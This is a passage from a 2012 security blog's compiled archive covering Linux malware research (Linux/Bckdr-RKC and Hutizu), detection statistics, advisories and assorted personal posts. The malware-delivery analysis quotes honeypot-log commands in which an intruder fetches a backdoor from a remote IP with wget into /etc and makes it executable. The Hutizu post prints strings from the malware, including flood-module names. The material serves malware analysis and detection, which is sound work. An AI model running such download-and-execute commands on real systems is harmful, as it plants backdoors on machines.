documents which are hosted on blogspot.com, or any subdomains. Replace blogspot.com with your main domain, and see what results you nd. Beware: Many hackers already know these tricks, and will use them to perform reconnaissance on your company before initiating an attack. Even the most mundane documents, such as a list of email addresses and phone numbers, could be used to assist in launching a spear phishing (targeted phishing) attack against your company.
1. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html 2. http://caffeinesecurity.blogspot.com/2012/01/monitoring-for-new-zero-day-exploits.html 3. http://www.hackersforcharity.org/ghdb/
2.1.4
SOPA Blackout Day January 18 (2012-01-18 00:40)
January 18 is stop SOPA day. [1]Learn More...

1. http://sopablackout.org/learnmore
62
2.2. February
BlogBook
2.1.5
New @CaSec Twitter Feature: #exploitAlert (2012-01-25 13:30)
Ive taken the Google Alert zero day exploit feed and created automated Twitter notications. You can get updated #exploitAlert notications by following my Twitter account, [1]@CaSec. The feed currently monitors PasteBin for new exploits. Expect additional feeds soon!
1. http://twitter.com/CaffSec
2.1.6
CaSec SITREP - Cyber Intelligence for the masses (2012-01-27 16:22)
Leveraging the power of Google Alerts, I have started posting relevant news articles, public exploit releases, and other tidbits of information related to Cyber Security and Information Assurance. The best way to keep you and your organization prepared for unknown threats is to keep tabs on the current state of the security of the internet. There are currently three ways to view SITREP messages: Twitter, following [1]@CaSec Tumblr through the[2] CaSec SITREP blog The [3]CaSec Daily SITREP Online Newspaper Please enjoy these valuable resources!
1. http://twitter.com/CaffSec 2. http://caffsec.tumblr.com/ 3. http://paper.li/CaffSec/1327635218
2.2
2.2.1
February
UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection
(2012-02-17 19:01)
UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed [1]HERE, including newest detection statistics. Thanks! Its been approximately 2 months since the original discovery of Linux/Bckdr-RKC This Linux trojan is still undetected, according to VirusTotal.com
Virustotal: [2].xsyslog Virustotal: [3].ssyslog
In fact, it would appear that even Sophos is no longer detecting this trojan. I have resubmitted the le to multiple antivirus vendors, in hopes that they may pay attention to my submission this time. For those who arent familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan. [4]http://pastebin.com/DwtX9dMd Id also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: [5]http://code.google.com/p/casec-malware-analysis/ Keep ghting the good ght.
1. http://caffeinesecurity.blogspot.com/search/label/Linux%2FBckdr-RKC 2. https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/
63
BlogBook
1329521280/
2.3. March
3. https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/ 1329521356/ 4. http://pastebin.com/DwtX9dMd 5. http://code.google.com/p/caffsec-malware-analysis/
2.3
2.3.1
March
Coming Soon: Android for the Paranoid Article Series (2012-03-08 10:39)
Ive decided to write a series of articles titled Android for the Paranoid. The articles will be an in-depth look at some of the Android security related applications out there, and how they can be leveraged by you and your organization. If you have any apps you would like me to specically look at, please post in the comments section below!
2.3.2
Have you checked out the free security magazines lately, available from Caeine Security? (2012-03-09 15:59)
Have you checked out the Latest Free IT Security Magazines and Downloads box to the right? There are some really nice oers available right now, and none of these downloads and magazines cost a dime! Theyre just another free service oered by Caeine Security. Access some great resources today! -> -> -> -> The full catalog of available resources is available here: [1]Complimentary Industry Resources
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB: &ch=1091&_m=01.00ev.1.0.0&ct=Infosec&flt=all
2.3.3
Hutizu
aka
Linux/Bckdr-RKC
and
Duqu
Links?
Food
for
Thought.
(2012-03-09 16:28)
I cant put my nger on it, but after looking at this article on the mystery of the [1]Duqu Framework, and looking at my publicly posted [2]decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two. Ive sent this to Kaspersky, so well see if they get back to me on it. Can you see any similarities? If so, please share! UPDATE: The virus in question is now being detected by limited AV programs as the Hutizu backdoor.
1. http://www.securelist.com/en/blog/667/The_Mystery_of_the_Duqu_Framework 2. http://code.google.com/p/caffsec-malware-analysis/source/browse/#svn%2Ftrunk%2Fssyslog
2.3.4
Linux/Bckdr-RKC Delivery Method Analyzed (2012-03-10 11:55)
You can tell a lot about an attacker based upon their methods of attack. -Automated attacks happen rapidly, with no time for typing -Manual attacks happen slowly, as the attacker has to type commands -Typos and misspellings indicate a manual attack -Connection string will give away what kind of operating system the attacker is using Lets take a look at both pieces of the Linux/Bckdr-RKC malware Ive received. 64
2.3. March
BlogBook
.xsyslog First seen 2011-12-21 11:56:26 User connected from 64.62.224.250 (This is a United States IP address, no host name) User SSH client was SSH-2.0-libssh2 1.3.0 11:56:27: User downloaded .xsyslog to /etc/ using wget -P/etc/ http://216.83.44.229:99/.xsyslog 11:56:28: User granted executable permission using chmod 777 /etc/.xsyslog 11:56:28: User performed a cat /proc/version 14:04:06: User disconnected .ssyslog First seen 2011-12-24 06:54:03 User connected from 61.147.75.6 (This is a Chinese IP address, no host name) User SSH client was SSH-2.0-libssh2 1.3.0 06:54:06: User downloaded .ssyslog to /etc/ using wget -P/etc/ http://216.83.44.229:99/.ssyslog at 06:54:08: User granted executable permission using chmod 777 /etc/.ssyslog 06:54:09: User performed a cat /proc/version 06:55:42: User disconnected 08:53:24: User reconnected and retried above procedure from 61.147.75.6 09:01:49: User disconnected 10:37:44: User reconnected and retried above procedure from 61.147.75.6 (did not disconnect) Then a second connection appears: User connected from 87.217.199.83 (83.199.217.87.dynamic.jazztel.es - from Spain) User SSH client was SSH-2.0-PuTTY Release 0.60 10:49:58: User connected and manually mistyped root password as 1234567 10:50:00: User re-entered correct root password as 123456 User proceeded to try and open common Linux text editors nano and pico User attempted to install nano and pico using yum. 10:51:05: Frustrated, the user sent a reboot command 10:51:23: 87.217.199.83 disconnects 10:57:36: 61.147.75.6 disconnects What can we learn about the attacker from the above sequence of events? - Both .xsyslog and .ssyslog were delivered by a libssh2 client, indicating a non-windows system - The remote install of .xsyslog and .ssyslog may be automated, due to the rapid entry of commands - The remote install of .ssyslog was being monitored by its botmaster, who attempted to actually debug why the malware was not phoning home - The botmaster/attacker has some working knowledge of how the .xsyslog and .ssyslog malware functions, and attempted to troubleshoot, indicating he/she is not simply a script kiddy using someone elses malware - The botmaster is possibly located in Spain, or relayed through a compromised system in Spain - The botmaster uses a Windows system, since the troubleshooting connection was performed using Putty. Similarities between .xsyslog and its later counterpart, .ssyslog: - Both pieces of malware were hosted by the same IP address. - Both pieces of malware are placed in the /etc/ folder - Both pieces of malware are executed by running /proc/version
2.3.5
Mario 2012 - Help Raise Awareness! (2012-03-17 14:45)
Mario 2012 is a lm and campaign by Caeine Security that aims to make Mario the plumber famous, not to celebrate him, but to raise support for his arrest. Please watch the video, and support this awareness campaign!
65
BlogBook [EMBED]
2.3. March
2.3.6
Hutizu Under the Hood (2012-03-20 17:00)
Been looking at the STRINGS result of .ssyslog... Which is now detected by a small number of AV vendors as Hutizu [1]http://code.google.com/p/casec-malware-analysis/source/brow se/trunk/ssyslog/ssyslog-strings.txt A few interesting items jumped out at me. First, here are a list of les which were associated with compiling .ssyslog: util.h udp_flood.h syn_flood.h ack_flood.h dns_flood.h update.h getdns.h connect.h main.c types.h stddef.h time.h pthreadtypes.h stdint.h types.h time.h select.h socket.h sockaddr.h in.h stdio.h libio.h netdb.h globel.h ip.h udp.h tcp.h config.h ip.h Second, I found this interesting tidbit: GET / HTTP/1.1 User-Agent: huituzi-monitor Accept: */* host: about.huituzi.net 66
2.3. March
BlogBook
Ive never heard of huituzi-monitor. Anyone? I also found that the performs some DNS checks using 8.8.8.8, which is Googles public DNS server. I assume this is for cross checking of external DNS references to internal ones? Finally, the following IP addresses are present in .ssyslog, however, they arent present in the decompiled version. Their purpose is currently unknown. Based on the format, they are most likely subnet masks. Do you recognize any of these? Preliminary searching shows all of these IP addresses blocks are registered to China.
112.100.0.0 219.147.219.0 219.147.237.0 222.170.67.0 218.7.250.0 218.7.7.0 218.7.80.0 218.8.128.0 221.210.153.0 221.210.200.0 221.211.8.0 60.11.111.0 60.11.141.0 60.11.254.0 60.15.127.0 60.219.1.0 61.180.140.0 61.180.230.0 202.118.166.0 202.118.176.0 202.118.192.0 202.118.223.0 202.118.224.0 219.149.194.0 202.98.0.0 221.9.167.0 61.138.129.0 61.138.186.0 111.116.64.0 202.198.16.0 202.198.8.0 59.72.128.0 219.148.204.0 219.149.6.0 202.96.64.0 202.96.69.0 60.19.18.0 125.222.200.0 202.118.1.0 202.118.40.0
67
BlogBook 202.118.48.0 202.118.66.0 202.118.81.0 219.217.80.0 222.26.127.0 219.141.148.0 219.141.157.0 220.181.125.0 220.181.19.0 220.181.61.0 202.106.0.0 202.106.195.0 202.106.196.0 61.135.178.0 61.135.23.0 202.112.112.0 202.112.128.0 202.112.14.0 202.112.176.0 202.112.20.0 202.112.209.0 202.120.224.0 202.204.112.0 202.204.160.0 202.204.48.0 202.204.60.0 202.204.65.0 202.205.0.0 202.205.208.0 202.205.80.0 202.207.240.0 202.4.130.0 210.31.32.0 210.35.128.0 210.42.159.0 210.44.112.0 210.47.244.0 211.64.144.0 211.66.88.0 211.68.71.0 211.81.20.0 219.243.239.0 219.150.59.0 202.99.69.0 202.99.96.0 202.113.112.0 202.113.128.0 202.113.15.0 202.113.168.0 202.113.32.0 68
2.3. March
2.3. March 202.113.48.0 202.113.64.0 202.113.80.0 202.113.96.0 211.68.208.0 211.68.224.0 59.67.148.0 219.148.19.0 222.222.202.0 222.222.222.0 121.17.127.0 121.28.7.0 202.99.171.0 218.11.142.0 218.12.131.0 218.12.199.0 221.194.33.0 221.194.57.0 60.10.134.0 60.2.145.0 60.6.40.0 60.8.44.0 202.206.100.0 202.206.144.0 202.206.160.0 202.206.192.0 202.206.223.0 202.206.48.0 202.206.80.0 219.146.2.0 123.129.192.0 218.58.118.0 222.132.102.0 60.215.138.0 202.116.0.0 202.194.116.0 202.194.133.0 202.194.145.0 202.194.15.0 202.194.40.0 202.194.48.0 211.87.176.0 219.218.18.0 219.149.135.0 121.30.5.0 124.163.5.0 124.164.7.0 124.165.6.0 124.166.7.0 124.167.4.0
BlogBook
69
BlogBook 202.97.131.0 202.99.216.0 60.220.6.0 60.221.4.0 60.222.1.0 60.223.7.0 202.117.0.0 219.244.0.0 117.34.127.0 125.76.192.0 218.30.19.0 61.134.1.0 123.139.188.0 123.139.211.0 221.11.64.0 221.11.89.0 202.117.128.0 202.117.64.0 202.117.96.0 202.200.112.0 202.200.144.0 202.200.32.0 202.200.48.0 202.200.80.0 202.201.252.0 210.27.80.0 218.195.208.0 218.195.24.0 218.195.56.0 219.247.255.0 222.24.94.0 222.25.77.0 59.76.48.0 222.74.1.0 222.74.126.0 110.6.180.0 116.113.84.0 202.207.0.0 202.207.16.0 210.31.176.0 124.224.20.0 221.199.1.0 221.199.14.0 202.201.152.0 61.178.0.0 61.178.2.0 221.7.34.0 202.201.0.0 202.201.18.0 202.201.32.0 70
2.3. March
2.3. March 202.201.48.0 202.201.64.0 202.201.80.0 202.201.89.0 210.26.0.0 210.26.16.0 202.100.128.0 202.100.138.0 221.207.58.0 61.128.114.0 221.7.1.0 202.201.160.0 202.98.224.0 202.98.239.0 221.13.65.0 210.41.4.0 125.70.254.0 182.151.191.0 218.6.200.0 220.167.29.0 124.161.97.0 221.10.25.0 60.255.80.0 202.115.112.0 202.115.128.0 202.115.144.0 202.115.160.0 202.115.192.0 202.115.32.0 202.115.64.0 202.115.80.0 202.202.145.0 202.202.192.0 202.202.208.0 202.202.96.0 211.83.241.0 222.176.21.0 222.180.120.0 61.128.128.0 61.128.130.0 61.128.192.0 221.5.203.0 221.7.92.0 202.202.0.0 202.202.32.0 202.103.44.0 221.232.247.0 59.175.246.0 58.19.121.0 58.19.122.0
BlogBook
71
BlogBook 202.114.0.0 202.114.112.0 202.114.200.0 202.114.255.0 202.114.32.0 202.114.64.0 202.114.79.0 202.114.88.0 202.114.96.0 202.197.159.0 211.67.48.0 211.84.160.0 211.84.208.0 218.196.240.0 218.197.80.0 222.85.85.0 222.88.49.0 222.88.88.0 202.102.224.0 202.102.227.0 61.163.252.0 125.219.48.0 202.196.0.0 202.196.192.0 202.196.208.0 202.196.32.0 202.196.64.0 202.196.80.0 202.196.96.0 202.197.208.0 210.43.128.0 210.43.144.0 210.43.24.0 211.67.128.0 211.67.191.0 218.198.48.0 218.198.80.0 222.21.112.0 59.69.128.0 202.102.192.0 202.102.199.0 202.102.214.0 61.132.161.0 211.162.0.0 58.242.16.0 58.242.160.0 58.242.176.0 58.242.193.0 58.242.2.0 58.242.48.0 72
2.3. March
2.3. March 202.38.64.0 210.45.128.0 210.45.144.0 210.45.16.0 210.45.240.0 210.45.92.0 221.228.255.0 222.92.170.0 61.147.37.0 61.155.104.0 122.192.80.0 221.6.151.0 221.6.176.0 221.6.231.0 221.6.246.0 221.6.4.0 221.6.96.0 58.240.56.0 58.240.57.0 58.241.208.0 202.119.112.0 202.119.168.0 202.119.200.0 202.119.208.0 202.119.24.0 202.119.32.0 202.119.64.0 202.119.80.0 202.195.112.0 202.195.160.0 202.195.176.0 210.28.39.0 210.28.80.0 210.29.152.0 210.29.64.0 211.65.116.0 211.65.64.0 116.228.111.0 116.236.159.0 180.168.255.0 202.96.209.0 112.64.143.0 112.65.184.0 58.247.118.0 202.120.127.0 202.120.143.0 202.120.144.0 202.120.181.0 202.120.2.0 202.120.80.0
BlogBook
73
BlogBook 202.121.138.0 202.121.48.0 210.35.68.0 115.236.4.0 125.112.124.0 125.123.0.0 202.101.172.0 202.101.173.0 202.96.113.0 218.75.3.0 220.187.246.0 60.191.249.0 61.130.219.0 61.153.177.0 61.153.198.0 61.153.81.0 61.153.83.0 61.174.95.0 61.175.111.0 123.157.135.0 123.157.240.0 124.160.12.0 221.12.100.0 221.12.49.0 221.12.65.0 221.12.85.0 210.32.0.0 210.33.24.0 222.246.129.0 59.51.78.0 61.187.72.0 58.20.125.0 58.20.126.0 202.197.240.0 202.197.64.0 210.43.192.0 210.43.47.0 202.101.224.0 202.101.226.0 61.131.253.0 118.212.168.0 222.204.2.0 218.85.152.0 218.85.157.0 58.22.100.0 58.22.101.0 58.23.0.0 58.23.9.0 210.34.0.0 210.34.128.0 74
2.3. March
2.3. March 210.34.32.0 210.34.48.0 219.229.132.0 202.98.192.0 202.98.198.0 202.98.199.0 221.13.28.0 221.13.30.0 210.40.0.0 210.40.128.0 210.40.144.0 210.40.64.0 222.172.200.0 222.221.0.0 221.3.136.0 202.203.128.0 202.203.160.0 202.203.208.0 202.203.230.0 210.40.176.0 119.145.45.0 202.96.136.0 61.140.11.0 120.80.10.0 120.80.11.0 120.80.193.0 120.80.201.0 120.80.237.0 120.80.8.0 120.80.9.0 210.21.114.0 210.21.2.0 210.22.3.0 220.249.251.0 221.4.147.0 221.4.158.0 221.4.224.0 221.5.1.0 58.251.56.0 58.251.57.0 202.116.128.0 202.116.160.0 202.116.192.0 202.116.32.0 202.192.88.0 202.38.193.0 218.192.12.0 218.192.144.0 218.192.240.0 219.223.222.0
BlogBook
75
BlogBook 219.223.252.0 219.223.254.0 222.17.127.0 222.200.128.0 222.200.129.0 180.137.252.0 222.217.39.0 121.31.60.0 221.7.138.0 221.7.247.0 210.36.158.0 210.36.16.0 202.100.192.0 202.100.199.0 221.11.156.0 210.37.79.0
2.3. March
1. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt
2.3.7
Hutizu and Linux/Bckdr-RKC Detection Statistics (2012-03-20 19:13)
Lets take a look at current detection statistics for Linux/Bckdr-RKC. The newer variant has been named the Hutizu backdoor by Antivirus vendors. .xsyslog - The original le placed on my honeypot. Commonly known as Linux/Bckdr-RKC or Linux/PKC Metascan: 1/25 detection [1]http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s 9hg3hss792 Fortinet detects as Linux/PKC.A!tr.bdr VirusTotal: 0/43 detection [2]https://www.virustotal.com/le/ce62318acfb28e7ad5c915b0bb7cb c256b5c682097d33d1a002856b21d7324/analysis/1332284106/ VirScan: 3/36 detection [3]http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b. html Fortinet detects as Linux/PKC.A!tr.bdr Kaspersky detects as Backdoor.Linux.PKC.a Sophos detects as Linux/Bckdr-RKC .ssyslog - The newer variant Commonly known as Hutizu Metascan: 3/25 detection [4]http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz 64utld97m0 ArcaVir detects as Linux.Hutizu.a Fortinet detects as Linux/Hutizu.A!tr.bdr Ikarus detects as Backdoor.Linux.Hutizu VirusTotal: 7/43 detection [5]https://www.virustotal.com/le/414a142016cab43d85c7b85a61426 f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/ Comodo detects as UnclassiedMalware Emsisoft detects as Backdoor.Linux.Hutizu!IK Fortinet detects as Linux/Hutizu.A!tr.bdr 76
2.3. March Ikarus detects as Backdoor.Linux.Hutizu Jiangmin detects as Backdoor/Linux.ab Kaspersky detects as Backdoor.Linux.Hutizu.a Sophos detects as Linux/Hutizu-A VirScan: 8/36 detection [6]http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c. html a-squared detects as Backdoor.Linux.Hutizu!IK ArcaVir detects as Linux.Hutizu.a Comodo detects as UnclassiedMalware Fortinet detects as Linux/Hutizu.A!tr.bdr Ikarus detects as Backdoor.Linux.Hutizu Jiangmin detects as Backdoor/Linux.ab Kaspersky detects as Backdoor.Linux.Hutizu.a Sophos detects as Linux/Hutizu-A This is good news, as it means anti-virus vendors are starting to detect this malware. But the bad news is, only a small fraction of AV vendors are detecting it!
1. http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
BlogBook
2. https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/ 1332284106/ 3. http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html 4. http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0 5. https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/ 1332284644/ 6. http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
2.3.8
Hutizu/Huituzi - Follow the Gray Rabbit (2012-03-20 19:59)
When typing Huituzi (the Chinese phonetic originally found in .ssyslog) into Google Translate, when performing phonetic typing for Chinese, huituzi translates into pTP, which in Chinese apparently means Gray Rabbit. So, we now know the name of this amazing piece of malware. According to Wikipedia, in Chinese literature, rabbits accompany Change (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are also one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar. A very interesting note: This malware was discovered in 2011 - the Chinese year of the Metal Rabbit, or J+nsh t (^T). The question remains - how deep does this rabbit hole go? Im updating all of my .ssyslog posts to include Hutizu since that is the ocial detection name.
2.3.9
Linux Processes Memory Layout, exit, and exit C Functions (2012-03-21 18:35)
This is a great article from TheGeekStu.com. Very relevant for those who analyze Linux malware. In this article, we will discuss about the memory layout of a process and the process terminating C functions. [1]Linux Processes Memory Layout, exit, and exit C Functions
1. http://www.thegeekstuff.com/2012/03/linux-processes-memory-layout/#.T2pW0A12hVI.blogger
77
BlogBook
2.3. March
2.3.10
Flash Farce: The Dangers of Social Media Inuencing Real World Actions
(2012-03-22 17:30)
Were lucky it hasnt happened yet. Or maybe it has and we dont know it. Weve all heard how ash mobs, protests such as Occupy Wall Street, and even revolutions such as Arab Spring can be organized through social media such as Twitter or Facebook. Viral videos, trending Twitter hash tags, Change.org petitions, Facebook pages...all of these are tools used to help bring about social change. But how many people actually check the origins of a social change campaign or movement? And would it even do them any good? How would anyone know the true origins, or motivations, behind an online campaign? On the Internet, anyone can claim to be someone else. In fact, some people even have multiple identities online. Sometimes, identities are compromised, and someone you thought was your friend from high school could suddenly be a scammer from Europe or Africa, claiming to need nancial assistance after losing all their money overseas. Now, lets add one more evil twist to this plot. What if the people you are friends with on Twitter or Facebook dont even exist? What if these are false accounts controlled by a criminal organization, or a government? What if one of your friends have been replaced by someone with malicious intentions against you? Dont think it can happen? Ask the members of LulzSec, an oshoot of Anonymous. Their leader, Sabu, was arrested by the authorities, then cooperated to help identify and arrest the members of his own group. Now, consider Arab Spring. Specically, Lybia. The government of Lybia recognized that social media was being used to organize ash mob protests, and in response shut o the internet to the entire country. While this was one way to handle the protest...consider another more sinister scenario. What if the government responded by organizing more protests? What if the government organized these ash mob protests in controlled locations with the military standing by to arrest or perhaps even kill the protesters shortly after they arrive? Propaganda has long been a tool used in war. Why ght an enemy, when you can make the enemy ght among themselves? An invading country can take another through brute force, but why bother, if your losses can be signicantly reduced by convincing the countrys citizens that life would be better under your rule? If a Communist country would desire to take over a Capitalist one, the best way to do so would not be through soldiers, tanks, planes, and missiles. The best way to take over a Capitalist country would be to appeal to the lower income earners, who undoubtedly struggle to make ends meet, and envy those who make more money than themselves. So, why not start an online movement in that country to distribute wealth and make everyones income equal. Of course, the only way this would ever happen is if the government regulated and controlled everything. In a Capitalist country, this will never happen, because the owners of companies and corporations would never allow it. But once enough civil unrest has been seeded, it would be quite easy to begin invading the country with troops, promising a better life to its citizens, oering to liberate the countrys citizens from their oppressive government. This would have an even higher chance of success if the country is in the middle of an economic crisis, with high unemployment and large amounts of debt. Promise everyone employment and equal pay under a new government-owned and controlled economy. Sounds scary, doesnt it? Think it could ever happen? It could be happening right now, somewhere in the world, and we might not even know it until the troops begin attacking, and the bombs begin falling from the sky. But by then, it may be too late. Social media is a useful tool, much like the hunting spear. Early man developed the hunting spear as a tool to kill animals for food. Then he turned around and used the same hunting spear as a weapon against his fellow man...to take his fellow mans food as well. Consider the hunting spear the next time you see an online campaign or movement supporting a cause. Is the online campaign a tool, or a weapon? 78
2.3. March
BlogBook
2.3.11
Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety (2012-03-26 15:21)
[1] I noticed something disturbing today. Ever since about the 15th of March (noticed this on some of my Friends posts going back to the 13th), my Facebook posts have started including my location. Thats pretty disturbing, because I never enabled Facebook to share my location. It would seem Facebook has enabled this setting by default. In fact, if I wanted everyone to know where I am, I would have typed my location in my Facebook post. This really becomes problematic if I were to use Facebook while on vacation. Suddenly my posts will tell everyone Im not home, and depending on my privacy settings, thats pretty much telling the world hey, hes on vacation, go steal stu from his house!. Ive noticed most of my friends posts are including this information as well. Facebook does provide instructions on disabling location sharing ([2]https://www.facebook.com/about/location) but its not very clear if these settings stick. I urge you the next time you post on Facebook, check to see if there is a small gray box below your post which includes your approximate location. If there is, click the X inside that box to disable location sharing. Share this message with your friends and family on Facebook, and help them be safe online too!
1. http://2.bp.blogspot.com/-NCB-mZ1kusU/T3DAKLCzsNI/AAAAAAAAAJI/7rtwt9oup-A/s1600/clickthex.PNG 2. https://www.facebook.com/about/location
2.3.12
Executable and Linkable Format (ELF) Guide (2012-03-28 12:09)
Yesterday I found a very handy guide for understanding Linux ELF les. Great for malware analysis! Thought I would share it with everyone else. [1]http://www.acsu.bualo.edu/ charngda/elf.html
1. http://www.acsu.buffalo.edu/%7Echarngda/elf.html
2.3.13
How to Mitigate Anonymous Internet Shutdown March 31 (2012-03-28 18:40)
In case you havent heard, Anonymous plans to [1]shutdown the internet March 31 to protest a multitude of issues which Im not going to bother to get into right now. The plan is to attack all 13 root DNS servers with Denial of Service (DoS) attacks. By shutting down all 13 root DNS servers, a domino eect will be felt throughout the internet and eventually all DNS queries will begin to time out. Their plan is pretty bold, and will require a tremendous number of computer systems attacking at once. While it is unknown if Anonymous plan can succeed, there are a few things you can do to mitigate this threat from aecting your organization. 1) Dont panic. This shutdown is on a Saturday, so the number of employees this aects will be minimal. If your organization isnt even open on Saturdays, then this wont aect your organization at all. 2) If you are open on Saturday, consider putting one of your local DNS servers in caching mode if it isnt
79
BlogBook
2.4. April
already, and increase the DNS caching time to live (TTL) to 86400 seconds (24 hours). Any commonly used sites should remain cached throughout the attack. Its a good idea to revert to your original settings Monday morning. 3) Finally, if you absolutely must have access to certain websites with static IP addresses, such as business partners or suppliers, consider making available to your on-call support sta a hosts le with critical domain names and IP addresses pre-loaded, so that they can drop this le on any organizational systems which start to have DNS problems. Once again, revert to your original settings Monday morning. These three simple tips should help keep your organization up and running, should Anonymous actually succeed in taking down one or more root DNS servers. For home users, I would recommend checking your local weekend weather forecast Friday evening. If its going to be nice out, be ready to go outside for a change, get some exercise and have some fun. If not, consider breaking out some board games for the kids, or nd yourself a nice book to read. Its only one day, if it even happens, and its not the end of the world.
1. http://pastebin.com/GFkQnf6e
2.4
2.4.1
April
Why am I in Computer Security?
(2012-04-09 13:50)
Ask the U.S. Commerce Department
Should we ever get to the point where the computers we use present more risk than provide value, it will undoubtedly be time to unplug them. I could write a very lengthy article on why I am in the computer security eld. But Im not going to. Instead, Im going to link to a news article about the U.S. Commerce Departments Economic Development Administration. This is what I want to help prevent from happening. [1]Computer Virus Plunges Government Agency Into Dark Ages
1. http: //www.npr.org/blogs/thetwo-way/2012/04/09/150290867/computer-virus-plunges-government-agency-into-dark-ages
2.4.2
Project Beekeeper - A Mobile Honeypot Project (2012-04-09 23:00)
Im proud to announce my latest research project, Project Beekeeper. In this project I will be creating a mobile hotspot and taking it to public locations, keeping track of how many people connect at each location over a period of time. I wont be scanning them when they connect, simply recording their system/phone name and MAC address, and collecting statistics. Ill be using a rooted HTC T-Mobile G1 running Android 1.6, which is no longer connected to a wireless carrier. This will all be made possible by [1]Barnacle Wi Tether, a great piece of software which is available on [2]Google Play.
1. http://szym.net/barnacle/ 2. https://play.google.com/store/apps/details?id=net.szym.barnacle
2.4.3
Sony BRAVIA TV Datagram Flooding Denial of Service (2012-04-10 15:04)
Heres an interesting vulnerability... Who would have thought youd need to worry about your TV being subject to an attack? 80
2.4. April
BlogBook
A vulnerability has been reported in Sony BRAVIA TV, which can be exploited by malicious people to cause a DoS (Denial of Service). Source: [1]Secunia Advisory SA48705
1. http://secunia.com/advisories/48705/
2.4.4
Ive been losing about 1 lb per day thanks to @ZipFizzCorp (2012-04-10 18:31)
Ive been losing about a pound per day by slightly changing my diet and switching from soda to bottled water plus [1]ZipFizz. First, a little about me. Im a computer security professional, and rarely have time to leave my desk. I dont exercise nearly as often as I should (barely ever), simply because I dont have the time. For about a month now, Ive changed my diet to try to lose weight, and its working! I recently started tracking my weight, and Im losing about a pound per day. Im not going to lie, ZipFizz is not some miracle drug or anything of the sort...I did have to alter my diet as well as switch to ZipFizz. My diet before ZipFizz: I never have time to eat breakfast in the morning, because Ive got to get to work and dont have time. Because of this, I normally eat lunch around 11 am. To keep me going during the day, I drink a lot of caeine. I was drinking two 20 oz sodas during the work day. Thats 550 calories, and 156g of carbohydrates. Thats 50 % of your daily allowance for carbohydrates for a 2,000 calorie diet! On top of all this, I normally eat a microwave meal at about 400 calories, 41 carbohydrates. I usually have a bag of chips with my meal, so thats 160 more calories and 15g more carbohydrates. Sometimes Ill even eat a mid-afternoon snack, doubling those values. So, totaling all this up, Ive consumed BEFORE I go home for dinner: 1270 calories (63.5 % of daily allowance for 2,000 calorie diet) 212g carbohydrates (70 % of daily allowance for 2,000 calorie diet) Then when I got home, I would eat a large dinner with my wife, drink MORE soda, and greatly exceed the number of calories, carbs, and sugars I should be taking in. Now: I still dont have time to eat breakfast, so I still eat lunch around 11 am. I switched from 2 sodas per day to 2 ZipFizz with bottled water per day. Thats 20 calories, and 4 carbohydrates total. But Ive still got the same amount of energy, and can keep going all day long without feeling tired. I switched my microwave dinners to something with less calories, 350 calories instead of 550, but more carbohydrates (55g). I cut out the the bag of chips with my meal. Finally, I eliminated my afternoon snack and replaced it with chewable adult multivitamins which look like gummy bears, and taste decent. These have 50 calories, 11g carbohydrates. Update: Added nutritional information for the multivitamins. So now, during the day Im consuming the following: 420 calories (21 % of daily allowance for 2,000 calorie diet) 71g carbohydrates (24 % of daily allowance for 2,000 calorie diet) And the best part about it is, I havent had to change how much I exercise or how much I eat for dinner. The only change Ive made in the evenings is switching to diet soda instead of regular. The weight loss has been slow but steady, and I feel healthier. I encourage you to give ZipFizz a try as an alternative to coee or soda, especially if you need to lose some weight. You probably are questioning if ZipFizz paid me to type this blog post. They didnt. Ask them. I wrote this blog post because like many people in the IT eld, I have a weight problem, and I want to do something about it. I want to help others do something about it.
81
BlogBook
2.4. April
Disclaimer: Im not a physician, this is not medical advice, not responsible for what you do with this information. Consult a doctor before making serious changes in your diet.
1. http://www.zipfizz.com/index.html
2.4.5
Warning: Potentially Malicious Unfollow Twitter App (2012-04-12 14:48)
Twitter users have recently begun receiving spam claiming to be an unfollow app capable of telling you who has stopped following you on Twitter. Since this app is being advertised via spam, it should of course be treated as suspect. The spam uses multiple redirects to fool scanners: First Redirect Destination Analysis: (Clean) [1]https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90 681bb95f998c21a0bfce180324d44fbb/analysis/1334255656/ Second Redirect Destination Analysis: (Potentially damaging content per Websense Threatseeker) [2]https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea 7734b4a6ced2d403c32f16c69adf34/analysis/ At the very least, this is most likely a scam to get social networking impressions. Chances are fairly high, however, that this could be malicious software. If you receive any spam advertising this (or any other app), report the account to Twitter and they will deal with it accordingly.
1. https://www.virustotal.com/url/7ad5fc516c4a9a4689de1e5de82c90681bb95f998c2ff1a0bfce180324d44fbb/analysis/ 1334255656/ 2. https://www.virustotal.com/url/dbfafb76973527e77be5e8e15f30ea7734b4a6cffed2d403c32fff16c69adf34/analysis/
2.4.6
What if your hardware was infected with a virus? (2012-04-16 10:54)
